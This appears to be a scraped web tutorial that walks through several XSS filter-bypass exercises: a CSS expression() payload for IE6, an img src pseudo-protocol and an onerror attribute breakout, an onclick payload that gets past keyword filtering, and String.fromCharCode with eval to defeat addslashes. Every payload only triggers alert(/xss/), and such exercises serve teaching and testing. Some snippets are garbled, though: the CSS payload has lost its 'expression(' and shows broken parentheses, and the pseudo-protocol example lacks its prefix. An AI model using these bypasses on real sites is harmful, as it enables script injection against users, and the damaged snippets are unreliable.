##<script>alert(/xss/);</script>
- Restrictions: Only CSS can be used, html tags are not allowed
We know that expression can be used to construct XSS, but it can only be tested under IE. Therefore, please perform the following test in IE6.
body {
black;
xss:alert(/xss/));/*IE6下测试*/
}Copy after login
- Restrictions: HTML is escaped and the Image tag is available
.
The characters entered in the test will be inserted into the src address, so you can use a pseudo-protocol to bypass it.
Enter directly
alert( /xss/);
Copy after login
Or you can use events to bypass, just pay attention to the closing statement, as follows:
1" onerror=alert(/xss/); var a="1
- Restriction condition: Keyword filtering is used.
I tested it, most of it was filtered, and some were not filtered. After testing script/onerror, it was filtered, but onclick was not filtered. Use the onclick event to bypass
<img src=# onclick=alert(/xss/);>
Copy after login
- Restrictions: Use addslashes to escape the characteristic characters
That is to say, single quotes, double quotes, etc. cannot appear in our XSS statements. Characteristic characters.
Use
<script>alert(/xss/);</script>
Copy after login
directly to bypass
or use the String.fromCharCode method, as follows:
<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>
Copy after login
The above is the detailed content of How is the small test of xss carried out?. For more information, please follow other related articles on the PHP Chinese website!
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
